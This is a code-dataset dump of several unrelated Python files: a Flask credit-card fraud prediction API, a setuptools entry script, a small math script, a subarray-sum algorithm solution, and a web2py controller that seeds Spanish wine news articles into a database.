blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
57a398c163cfc577a5628456d81bc42e45971a36 | 22fc551d4b5c8e4e16683447389a5e4f22136130 | /app.py | 86ae32fae9bc14dc5ebc7daad4c05f290fd9ed8d | [] | no_license | arushi-kalra/creditcard | 988c262f2043c0fbf59ed2c22214362e16db1210 | 0eef904535a483f733ebfb70a336f2020edbfbbc | refs/heads/master | 2023-03-17T20:43:06.006936 | 2020-04-28T16:57:22 | 2020-04-28T16:57:22 | 259,698,336 | 0 | 0 | null | 2021-03-20T03:47:36 | 2020-04-28T16:54:11 | Python | UTF-8 | Python | false | false | 2,664 | py | import os
from flask import Flask, jsonify, request
from flask_restful import Api, Resource
#from model.Train import train_model
import pickle
app = Flask(__name__)
app.config["DEBUG"]=True
api = Api(app)
a= pickle.load(open('decisiontree.pkl','rb'))
b= pickle.load(open('logisticreg.pkl','rb'))
c= pickle.load(open('randomforest.pkl','rb'))
d= pickle.load(open('knn.pkl','rb'))
class MakePrediction(Resource):
@app.route('/predict', methods=['GET'])
def get():
avg_amt = request.args['Average Amount/transaction/day']
trans_amt = request.args['Transaction_amount']
is_dec = request.args['Is declined']
total_dec = request.args['Total Number of declines/day']
is_foreign = request.args['isForeignTransaction']
is_highrisk = request.args['isHighRiskCountry']
daily_chargeback = request.args['Daily_chargeback_avg_amt']
six_chbk = request.args['6_month_avg_chbk_amt']
six_freq= request.args['6-month_chbk_freq']
avg_amt1=float(avg_amt)
trans_amt1=float(trans_amt)
is_dec1=float(is_dec)
total_dec1=float(total_dec)
is_foreign1=float(is_foreign)
is_highrisk1=float(is_highrisk)
daily_chargeback1=float(daily_chargeback)
six_chbk1=float(six_chbk)
six_freq1=float(six_freq)
p = a.predict([[avg_amt,trans_amt,is_dec,total_dec,is_foreign,is_highrisk,daily_chargeback,six_chbk,six_freq]])[0]
q = b.predict([[avg_amt1,trans_amt1,is_dec1,total_dec1,is_foreign1,is_highrisk1,daily_chargeback1,six_chbk1,six_freq1]])[0]
r = c.predict([[avg_amt,trans_amt,is_dec,total_dec,is_foreign,is_highrisk,daily_chargeback,six_chbk,six_freq]])[0]
s = d.predict([[avg_amt,trans_amt,is_dec,total_dec,is_foreign,is_highrisk,daily_chargeback,six_chbk,six_freq ]])[0]
if p == 0:
predicted_class = 'no'
else:
predicted_class = 'yes'
if q == 0:
predicted_class1 = 'no'
else:
predicted_class1 = 'yes'
if r == 0:
predicted_class2 = 'no'
else:
predicted_class2 = 'yes'
if s == 0:
predicted_class3 = 'no'
else:
predicted_class3 = 'yes'
return jsonify({
'Prediction for decision tree': predicted_class,
'Prediction for logisticreg': predicted_class1,
'Prediction for randomforest': predicted_class2,
'Prediction for knn': predicted_class3
})
if __name__ == '__main__':
app.run()
| [
"noreply@github.com"
] | arushi-kalra.noreply@github.com |
a44289b24ca2531f005cf3df9251a07338db207a | 92b0de52a55ee964cc09150bb4f5f2a41d1d4dd1 | /venv/bin/easy_install | 117333f024fdb3c0eb1e0f606825c2f4a1f782db | [] | no_license | iopoz/parse_permissions | cb3ad4989c9683198db32b24e36bba52946bc75e | bdc385f9e9a0910d8aad506662b19eb531a1dcf5 | refs/heads/master | 2020-03-16T18:48:07.452942 | 2018-05-10T12:42:28 | 2018-05-10T12:42:28 | 132,887,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | #!/home/iopoz/PycharmProjects/parse_permissions/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==28.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==28.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==28.8.0', 'console_scripts', 'easy_install')()
)
| [
"2909kev@gmail.com"
] | 2909kev@gmail.com | |
171b69475b3c91f9c0914ff0f0250e3df0dc1140 | 017fa42113615ecf6335fe2384a9af79eb7e21b3 | /session15/my_math.py | 743f0614fdd30b888d64f80a753f5f6ff995e2e6 | [] | no_license | kmartinez33/MIStest | ba1c150fb3e96606408a53b2865f7a5a8c1437af | e661738975133d3d6f570c634c4c01c6876ede95 | refs/heads/master | 2020-09-17T15:41:44.712892 | 2016-11-15T17:31:49 | 2016-11-15T17:31:49 | 67,155,828 | 1 | 2 | null | 2016-10-04T22:09:51 | 2016-09-01T18:23:41 | Python | UTF-8 | Python | false | false | 158 | py | def square(x):
return x * x
def main():
year = int(input())
print("test: square(2016) ==", square(2016))
if __name__ == '__main__':
main()
| [
"kmartinez3@babson.edu"
] | kmartinez3@babson.edu |
4f7885709411c1849cb738566eade86235d66115 | 906ca170744eb2e075b7236814f2137a0283966d | /highFreq/subarraySumClosest.py | 375a0b7543a6c12ebb1706033df97221ba3ac4fe | [] | no_license | logancyang/lintcode | 815f893ee970d760403b409f2adcb11627ce917e | c541fa91b2187391320a8a1dd3e2ca75041b3dab | refs/heads/master | 2021-05-30T14:03:28.795033 | 2015-10-26T19:50:45 | 2015-10-26T19:50:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,259 | py | # subarraySumClosest: http://www.lintcode.com/en/problem/subarray-sum-closest/
class Solution:
"""
@param nums: A list of integers
@return: A list of integers includes the index of the first number
and the index of the last number
"""
# brute force O(n^3)
def subarraySumClosestBrute(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# this part is O(n^3), too slow
for i in xrange(len(nums)):
for j in xrange(i+1, len(nums)):
tmp_sum = sum(nums[i:j+1])
distance = abs(tmp_sum)
if distance < min_dist:
min_dist = distance
result = [i, j]
return result
def subarraySumClosest(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# compute prefix_sum[i] = sum(nums[:i+1]), O(n)
accumulator = 0
pair_sum_ind = []
for i in xrange(len(nums)):
accumulator += nums[i]
# accumulator is prefix_sum[i], i inclusive
pair_sum_ind.append((accumulator, i))
pair_sum_ind.sort(key=lambda tup: tup[0])
min_diff = float("inf")
for i in xrange(1, len(nums)):
diff = abs(pair_sum_ind[i][0] - pair_sum_ind[i-1][0])
if diff < min_diff:
min_diff = diff
result = [pair_sum_ind[i][1], pair_sum_ind[i-1][1]]
result.sort()
# since prefix_sum[j] - prefix_sum[i] refers to subarray sum i+1 to j
# the smaller index in prefix_sum should + 1
result[0] = result[0] + 1
return result
A = [-3, 1, 1, -3, 5]
Sol = Solution()
print Sol.subarraySumClosest(A) | [
"logan1934@gmail.com"
] | logan1934@gmail.com |
92154e6aec90e9b30a98b6e59896fc8253b68541 | 07d75948dbf78964a0bef428d95e4ea924dda5df | /controllers/desarrollador2.py | 594916cc76fd33abe9964c31f1492585faebcb74 | [
"LicenseRef-scancode-public-domain"
] | permissive | InstitutoPascal/Vinoteca | bf9c2a5c16349a892e446e6a719e65fc922de1b5 | d93d05a70a9ac5de55c054b632dd8f51f3eacaf3 | refs/heads/master | 2021-01-13T02:42:18.729162 | 2016-12-21T18:48:01 | 2016-12-21T18:48:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109,429 | py | def insertNoticia():
db.noticia.truncate()
from datetime import datetime
fdate='%d/%m/%Y'
try:
db.noticia.insert(titulo='BURBUJAS DE PLACER',fecha=datetime.strptime('16/12/2016',fdate),cuerpo='Entre tantas malas noticias que suelen abundar hay una muy buena; cada vez hay más vinos espumosos para disfrutar. Y qué mejor para celebrar un año difícil que se está despidiendo y recibir con esperanza al 2017 que está por comenzar que una co ...,',copete='Entre tantas malas noticias que suelen abundar hay una muy buena; cada vez hay más vinos espumosos para disfrutar. Y qué mejor para celebrar un año difícil que se está despidiendo y recibir con esperanza al 2017 que está por comenzar que una co ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52654_default_big.jpeg','rb'))
db.noticia.insert(titulo='TINTOS DE VERANO',fecha=datetime.strptime('08/12/2016',fdate),cuerpo='Si bien es una moda importada, como la mayoría adoptada por estas tierras, cuando hay vinos pensados para servirse más frescos de lo habitual, sobresalen en esta época. Porque las altas temperaturas suelen llamar a “otras bebidas”, así ren ...,',copete='Si bien es una moda importada, como la mayoría adoptada por estas tierras, cuando hay vinos pensados para servirse más frescos de lo habitual, sobresalen en esta época. Porque las altas temperaturas suelen llamar a “otras bebidas”, así ren ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52657_default_big.jpeg','rb'))
db.noticia.insert(titulo='OLD VINES= VINOS PARA DESCUBRIR LA HISTORIA DE LA VITICULTURA ARGENTINA',fecha=datetime.strptime('29/11/2016',fdate),cuerpo='Una guía de grandes vinos argentinos elaborados a partir de uvas provenientes de viñas antiguas "Al recorrer los viñedos, degustando las uvas y observando las características de plantas tan viejas y retorcidas por el paso del tiempo, es muy di ...,',copete='Una guía de grandes vinos argentinos elaborados a partir de uvas provenientes de viñas antiguas "Al recorrer los viñedos, degustando las uvas y observando las características de plantas tan viejas y retorcidas por el paso del tiempo, es muy di ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52662_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= 6 BLENDS BLANCOS IDEALES PARA ESTA PRIMAVERA',fecha=datetime.strptime('25/11/2016',fdate),cuerpo='Vinos y Bodegas te recomienda seis etiquetas aptas para diferentes estilos y presupuestos. Descubrí la selección Como se marcaba recientemente desde Vinos & Bodegas iProfesional, tras la tendencia por la cual más bodegas fueron bajándole el pu ...,',copete='Vinos y Bodegas te recomienda seis etiquetas aptas para diferentes estilos y presupuestos. Descubrí la selección Como se marcaba recientemente desde Vinos & Bodegas iProfesional, tras la tendencia por la cual más bodegas fueron bajándole el pu ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52669_default_big.jpeg','rb'))
db.noticia.insert(titulo='LA BODEGA MÁS LINDA DEL MUNDO ES ARGENTINA',fecha=datetime.strptime('16/11/2016',fdate),cuerpo='La red global Great Wine Capitals galardonó a Zuccardi Valle de Uco con el Premio Oro a la mejor Arquitectura y Paisajismo a nivel global Podría haber sido alguna francesa de Burdeos o quizás del Napa Valley californiano, pero para la Great Win ...,',copete='La red global Great Wine Capitals galardonó a Zuccardi Valle de Uco con el Premio Oro a la mejor Arquitectura y Paisajismo a nivel global Podría haber sido alguna francesa de Burdeos o quizás del Napa Valley californiano, pero para la Great Win ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52695_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS IDEALES PARA PASAR DE LOS BLANCOS DULCES A LOS TINTOS Y NO FALLAR EN EL INTENTO',fecha=datetime.strptime('11/11/2016',fdate),cuerpo='Desde Vinos & Bodegas te proponemos una guía de etiquetas para quienes buscan abrirse paso al mundo de los vinos tintos El vino es un gusto adquirido. Por algo las bodegas, en este último tiempo, han ido enfocándose en las neces ...,',copete='Desde Vinos & Bodegas te proponemos una guía de etiquetas para quienes buscan abrirse paso al mundo de los vinos tintos El vino es un gusto adquirido. Por algo las bodegas, en este último tiempo, han ido enfocándose en las neces ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52696_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= 8 MALBEC DE SALTA QUE NO PODÉS DEJAR DE PROBAR',fecha=datetime.strptime('08/11/2016',fdate),cuerpo='Los vinos de los Valles Calchaquíes tienen un carácter inconfundible. En este listado, ocho opciones que no fallan De las 40.000 hectáreas cubiertas con Malbec que se registran en todo el territorio nacional, Salta ostenta apenas el 3% del tota ...,',copete='Los vinos de los Valles Calchaquíes tienen un carácter inconfundible. En este listado, ocho opciones que no fallan De las 40.000 hectáreas cubiertas con Malbec que se registran en todo el territorio nacional, Salta ostenta apenas el 3% del tota ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52705_default_big.jpeg','rb'))
db.noticia.insert(titulo='SPARKLING NIGHTS 2016= UN ENCUENTRO CON LOS MEJORES ESPUMANTES DE LA ARGENTINA',fecha=datetime.strptime('04/11/2016',fdate),cuerpo='La octava edición de la única feria dedicada a esta bebida se realizará del 9 al 11 de noviembre en el Hotel Panamericano. Las entradas ya están a la venta. Del miércoles 9 al viernes 11 de noviembre se llevará a cabo la octava edición de l ...,',copete='La octava edición de la única feria dedicada a esta bebida se realizará del 9 al 11 de noviembre en el Hotel Panamericano. Las entradas ya están a la venta. Del miércoles 9 al viernes 11 de noviembre se llevará a cabo la octava edición de l ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52713_default_big.jpeg','rb'))
db.noticia.insert(titulo='CONOCÉ LOS 9 ESTILOS DEL MALBEC ARGENTINO Y DESCUBRÍ CUÁL TE GUSTA',fecha=datetime.strptime('27/10/2016',fdate),cuerpo='Hay muchos gustos para el Malbec, aunque se los puede resumir en 9 estilos. Chusmealos y fijate cuál es tu preferido. Mucho se habla de Malbec pero poco de los estilos de Malbec. Y a la hora de las copas, es el estilo el que define lo que esconde c ...,',copete='Hay muchos gustos para el Malbec, aunque se los puede resumir en 9 estilos. Chusmealos y fijate cuál es tu preferido. Mucho se habla de Malbec pero poco de los estilos de Malbec. Y a la hora de las copas, es el estilo el que define lo que esconde c ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52719_default_big.jpeg','rb'))
db.noticia.insert(titulo='ALTA GAMA LOW COST= 10 ETIQUETAS QUE VALEN MUCHO MÁS DE LO CUESTAN',fecha=datetime.strptime('25/10/2016',fdate),cuerpo='¿Te gusta darte un gusto con un vino de alta gama pero durante los últimos meses ese placer cuesta más que nunca? Agenda estos vinos y hace valer cada moneda. Mil, dos mil y hasta cinco mil son los precios que te llaman la atención de la gónd ...,',copete='¿Te gusta darte un gusto con un vino de alta gama pero durante los últimos meses ese placer cuesta más que nunca? Agenda estos vinos y hace valer cada moneda. Mil, dos mil y hasta cinco mil son los precios que te llaman la atención de la gónd ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52724_default_big.png','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= CINCO NUEVAS ETIQUETAS PARA MANTENERSE ACTUALIZADO',fecha=datetime.strptime('18/10/2016',fdate),cuerpo='Las novedades continúan llegando a las vinotecas. En esta producción, te presentamos cinco ejemplares tintos= tres Malbec, un Cabernet Franc y un blend Tres Malbec, un Cabernet Franc y un blend forman parte de esta producción de vinos recomenda ...,',copete='Las novedades continúan llegando a las vinotecas. En esta producción, te presentamos cinco ejemplares tintos= tres Malbec, un Cabernet Franc y un blend Tres Malbec, un Cabernet Franc y un blend forman parte de esta producción de vinos recomenda ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52740_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿CANSADO DE LOS TINTOS? PROBÁ ESTOS BLANCOS POR MENOS DE $100 Y DESCUBRÍ SABORES NUEVOS',fecha=datetime.strptime('14/10/2016',fdate),cuerpo='En materia de vinos la originalidad siempre cuesta más. Sin embargo, al apostar por vinos blancos harás diferencia numérica y renovarás el paladar. La góndola se puso picante. Ya sea en el chino, el súper o la vinoteca los precios de casi to ...,',copete='En materia de vinos la originalidad siempre cuesta más. Sin embargo, al apostar por vinos blancos harás diferencia numérica y renovarás el paladar. La góndola se puso picante. Ya sea en el chino, el súper o la vinoteca los precios de casi to ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52743_default_big.jpeg','rb'))
db.noticia.insert(titulo='EN QUÉ VINOS BUSCAR EL SABOR DE LA MADERA Y CÓMO RECONOCERLO',fecha=datetime.strptime('12/10/2016',fdate),cuerpo='Es más fácil que cazar Pokemones, pero igual hace falta tener olfato y gusto. En esta nota, todo lo que hay que saber para encontrarla. El buen vino es frutado. Sin embargo, hay vinos que además de frutas huelen y saben madera. No importa si son ...,',copete='Es más fácil que cazar Pokemones, pero igual hace falta tener olfato y gusto. En esta nota, todo lo que hay que saber para encontrarla. El buen vino es frutado. Sin embargo, hay vinos que además de frutas huelen y saben madera. No importa si son ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52765_default_big.jpeg','rb'))
db.noticia.insert(titulo='CONOCÉ LA DIFERENCIA ENTRE UN VINO MALBEC Y UN CABERNET SAUVIGNON',fecha=datetime.strptime('07/10/2016',fdate),cuerpo='Cuando se empieza a beber vinos una de las primeras preguntas es cómo se perciben las diferencias entre uno y otro. En esta nota, un plan simple para sacar provecho. El juego de las diferencias es simple= uno se concentra en lo que rompe cierta arm ...,',copete='Cuando se empieza a beber vinos una de las primeras preguntas es cómo se perciben las diferencias entre uno y otro. En esta nota, un plan simple para sacar provecho. El juego de las diferencias es simple= uno se concentra en lo que rompe cierta arm ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52767_default_big.jpeg','rb'))
db.noticia.insert(titulo='12 IRRESISTIBLES GRANIZADOS DE VINO',fecha=datetime.strptime('04/10/2016',fdate),cuerpo='¿Granizados con vino? Disfruta de las deliciosas recetas de una de las bebidas favoritas y más vigorizantes para el verano, los granizados. Prepara refrescantes granizados de vino con diferentes variedades, combinados sorprendentes de distintos sab ...,',copete='¿Granizados con vino? Disfruta de las deliciosas recetas de una de las bebidas favoritas y más vigorizantes para el verano, los granizados. Prepara refrescantes granizados de vino con diferentes variedades, combinados sorprendentes de distintos sab ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52771_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= CINCO MALBEC QUE OFRECEN UNA IMBATIBLE RELACIÓN CALIDAD-PRECIO',fecha=datetime.strptime('03/10/2016',fdate),cuerpo='Desde Vinos y Bodegas te proponemos cinco ejemplares que se lucen por ofrecer un plus respecto de su precio Con tantas alternativas de etiquetas reposando en las góndolas y precios en alza, salir de las marcas más masivas y tradicionales resulta ...,',copete='Desde Vinos y Bodegas te proponemos cinco ejemplares que se lucen por ofrecer un plus respecto de su precio Con tantas alternativas de etiquetas reposando en las góndolas y precios en alza, salir de las marcas más masivas y tradicionales resulta ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52774_default_big.jpeg','rb'))
db.noticia.insert(titulo='SIETE COSAS QUE HAY QUE SABER DECIR PARA IMPRESIONAR AL HABLAR DE VINOS',fecha=datetime.strptime('30/09/2016',fdate),cuerpo='El arte de parecer especialista tiene sus trucos. Si querés saber cuáles son para practicarlos o bien para detectarlos en otros, pegale una leída a esta nota. Cuando las cosas se dicen con familiaridad, en algún punto se demuestra conocimie ...,',copete='El arte de parecer especialista tiene sus trucos. Si querés saber cuáles son para practicarlos o bien para detectarlos en otros, pegale una leída a esta nota. Cuando las cosas se dicen con familiaridad, en algún punto se demuestra conocimie ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52779_default_big.jpeg','rb'))
db.noticia.insert(titulo='LA PAREJA PERFECTA= 6 VINOS RECOMENDADOS QUE CONJUGAN MALBEC Y CABERNET FRANC',fecha=datetime.strptime('29/09/2016',fdate),cuerpo='La variedad estrella de la Argentina y esta otra cepa que está en pleno ascenso, cuando se conjugan, suelen alumbrar vinos complejos, elegantes y muy bebibles. Un listado imperdible En los últimos años, la variedad Cabernet Franc se ha consolid ...,',copete='La variedad estrella de la Argentina y esta otra cepa que está en pleno ascenso, cuando se conjugan, suelen alumbrar vinos complejos, elegantes y muy bebibles. Un listado imperdible En los últimos años, la variedad Cabernet Franc se ha consolid ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52785_default_big.png','rb'))
db.noticia.insert(titulo='ESOS “RAROS VINOS NUEVOS”= LAS CEPAS NO TRADICIONALES DESPEGAN EN LA ARGENTINA',fecha=datetime.strptime('27/09/2016',fdate),cuerpo='En la Argentina no todo es Malbec. Las bodegas que vienen trabajando con variedades poco o nada conocidas son protagonistas de esta tendencia Hasta hace unos años, muy pocas bodegas se atrevían a lanzar vinos realmente diferentes y por fuera de ...,',copete='En la Argentina no todo es Malbec. Las bodegas que vienen trabajando con variedades poco o nada conocidas son protagonistas de esta tendencia Hasta hace unos años, muy pocas bodegas se atrevían a lanzar vinos realmente diferentes y por fuera de ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52787_default_big.jpeg','rb'))
db.noticia.insert(titulo='CUÁLES SON LOS 10 VINOS ARGENTINOS MÁS CAROS EN EL MUNDO',fecha=datetime.strptime('23/09/2016',fdate),cuerpo='El buscador de bebidas alcohólicas online Wine Searcher publicó el ranking de las etiquetas locales que alcanzan un precio más alto a nivel global Wine Searcher, el "google" de vinos de mayor relevancia global, dio a conocer días atrás la lis ...,',copete='El buscador de bebidas alcohólicas online Wine Searcher publicó el ranking de las etiquetas locales que alcanzan un precio más alto a nivel global Wine Searcher, el "google" de vinos de mayor relevancia global, dio a conocer días atrás la lis ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52798_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿HACÉS UN ASADO?, ACOMPAÑALO CON VINOS DE HASTA 180 PESOS',fecha=datetime.strptime('20/09/2016',fdate),cuerpo='Si pensás darle la bienvenida a la primavera con un asado de alto vuelo, agendá estos vinos y date un gusto gourmet. Hace años que los argentinos no esperamos con tanta ansiedad este cambio de estación. A pesar de su invierno helado, no muy de ...,',copete='Si pensás darle la bienvenida a la primavera con un asado de alto vuelo, agendá estos vinos y date un gusto gourmet. Hace años que los argentinos no esperamos con tanta ansiedad este cambio de estación. A pesar de su invierno helado, no muy de ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52799_default_big.jpeg','rb'))
db.noticia.insert(titulo='10 CONSEJOS PARA COMPRAR VINO Y NO CLAVARSE EN EL INTENTO',fecha=datetime.strptime('13/09/2016',fdate),cuerpo='A la hora de comprar vino, si no querés que te metan el perro, seguí los consejos. Seguro alguna vez compraste una botella que prometía todo y resultó ser un perno. Si bien es raro que un vino esté malo, puede pasar si no se toman ciertos reca ...,',copete='A la hora de comprar vino, si no querés que te metan el perro, seguí los consejos. Seguro alguna vez compraste una botella que prometía todo y resultó ser un perno. Si bien es raro que un vino esté malo, puede pasar si no se toman ciertos reca ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52862_default_big.jpeg','rb'))
db.noticia.insert(titulo='UN MALBEC ARGENTINO, ELEGIDO ENTRE LOS MEJORES DEL MUNDO',fecha=datetime.strptime('02/09/2016',fdate),cuerpo='El Pyros Barrel Selected Malbec 2014, elaborado en San Juan, recibió el premio a la mejor etiqueta producida fuera de los viñedos europeos en el Japan Wine Challenge 2016 Un vino de San Juan fue galardonado en la categoría al mejor vino del Nuevo ...,',copete='El Pyros Barrel Selected Malbec 2014, elaborado en San Juan, recibió el premio a la mejor etiqueta producida fuera de los viñedos europeos en el Japan Wine Challenge 2016 Un vino de San Juan fue galardonado en la categoría al mejor vino del Nuevo ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52880_default_big.jpeg','rb'))
db.noticia.insert(titulo='DE QUÉ HABLAMOS CUANDO HABLAMOS DE TERROIR Y EN QUÉ VINOS RECONOCERLO',fecha=datetime.strptime('30/08/2016',fdate),cuerpo='Cada vez más se invoca al terroir para explicar los vinos argentinos. Los consumidores no tienen claro qué es, ni para qué sirve, ni cómo emplear el concepto. Guía práctica para no iniciados. En los últimos cinco años el concepto de terroir ...,',copete='Cada vez más se invoca al terroir para explicar los vinos argentinos. Los consumidores no tienen claro qué es, ni para qué sirve, ni cómo emplear el concepto. Guía práctica para no iniciados. En los últimos cinco años el concepto de terroir ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53071_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿QUÉ QUIERE DECIR “LA AÑADA” DE UN VINO?',fecha=datetime.strptime('29/08/2016',fdate),cuerpo='En el mundo del vino hay tantos tecnicismos, que a veces, es difícil recordar el significado de muchos de los términos que vemos en la etiqueta de una botella. En este caso, no vamos a fijarnos en las palabras sino en los números. ¿Qué quiere de ...,',copete='En el mundo del vino hay tantos tecnicismos, que a veces, es difícil recordar el significado de muchos de los términos que vemos en la etiqueta de una botella. En este caso, no vamos a fijarnos en las palabras sino en los números. ¿Qué quiere de ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53078_default_big.jpeg','rb'))
db.noticia.insert(titulo='7 PREGUNTAS SIN RESPUESTA QUE TODO BEBEDOR DE VINOS SE HACE ALGUNA VEZ',fecha=datetime.strptime('25/08/2016',fdate),cuerpo='El amor al vino arranca por una curiosidad genuina. Sólo que algunas de esas preguntas originales nunca tienen respuesta. Saber o no saber de vinos es una cuestión de grado. Para una inmensa mayoría pronunciar bien Cabernet Sauvignon es suficie ...,',copete='El amor al vino arranca por una curiosidad genuina. Sólo que algunas de esas preguntas originales nunca tienen respuesta. Saber o no saber de vinos es una cuestión de grado. Para una inmensa mayoría pronunciar bien Cabernet Sauvignon es suficie ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53117_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿EL MUNDO PODRÍA QUEDARSE SIN CHAMPAGNE?',fecha=datetime.strptime('23/08/2016',fdate),cuerpo='Por clima extremo, los productores del espumante más famoso tienen que usar sus reservas para cumplir con las demandas de 2016. Primero nos enteramos de la escasez de cacao que podría llevar al aumento del precio del chocolate, y ahora llega otra ...,',copete='Por clima extremo, los productores del espumante más famoso tienen que usar sus reservas para cumplir con las demandas de 2016. Primero nos enteramos de la escasez de cacao que podría llevar al aumento del precio del chocolate, y ahora llega otra ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53313_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS 21 MEJORES RESTAURANTES CON DESCORCHE PARA LLEVAR TU VINO FAVORITO',fecha=datetime.strptime('19/08/2016',fdate),cuerpo='Si te gusta comer y beber bien pero te asusta el precio de las cartas, la mejor opción está en estos restaurantes que ofrecen descorche. Comer en buenos restaurantes es garantía de gasto, primero por los vinos y luego por los platos. ¿Pero qu� ...,',copete='Si te gusta comer y beber bien pero te asusta el precio de las cartas, la mejor opción está en estos restaurantes que ofrecen descorche. Comer en buenos restaurantes es garantía de gasto, primero por los vinos y luego por los platos. ¿Pero qu� ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53403_default_big.png','rb'))
db.noticia.insert(titulo='VINO Y YOGA, RAZONES PARA COMBINARLOS',fecha=datetime.strptime('17/08/2016',fdate),cuerpo='La obtención de una mente serena y un cuerpo fuerte, flexible y saludable, ¿son los objetivos que te habías planteado alcanzar? Imagínate que aparecen en forma conjunta, sencilla y natural. ¡El yoga! Los beneficios del yoga son reconocidos en to ...,',copete='La obtención de una mente serena y un cuerpo fuerte, flexible y saludable, ¿son los objetivos que te habías planteado alcanzar? Imagínate que aparecen en forma conjunta, sencilla y natural. ¡El yoga! Los beneficios del yoga son reconocidos en to ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53463_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿ES CONVENIENTE PARA LAS BODEGAS EN ARGENTINA HACER VENTA DIRECTA ONLINE?',fecha=datetime.strptime('05/08/2016',fdate),cuerpo='El mundo de internet es atractivo, a veces no sabemos ni porque ni como, pero tenemos la convicción de que hay que decir presente de alguna manera. En honor a la verdad, en estos tiempos que corren, el concepto de fondo no es tan errado, hay que dec ...,',copete='El mundo de internet es atractivo, a veces no sabemos ni porque ni como, pero tenemos la convicción de que hay que decir presente de alguna manera. En honor a la verdad, en estos tiempos que corren, el concepto de fondo no es tan errado, hay que dec ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53605_default_big.jpeg','rb'))
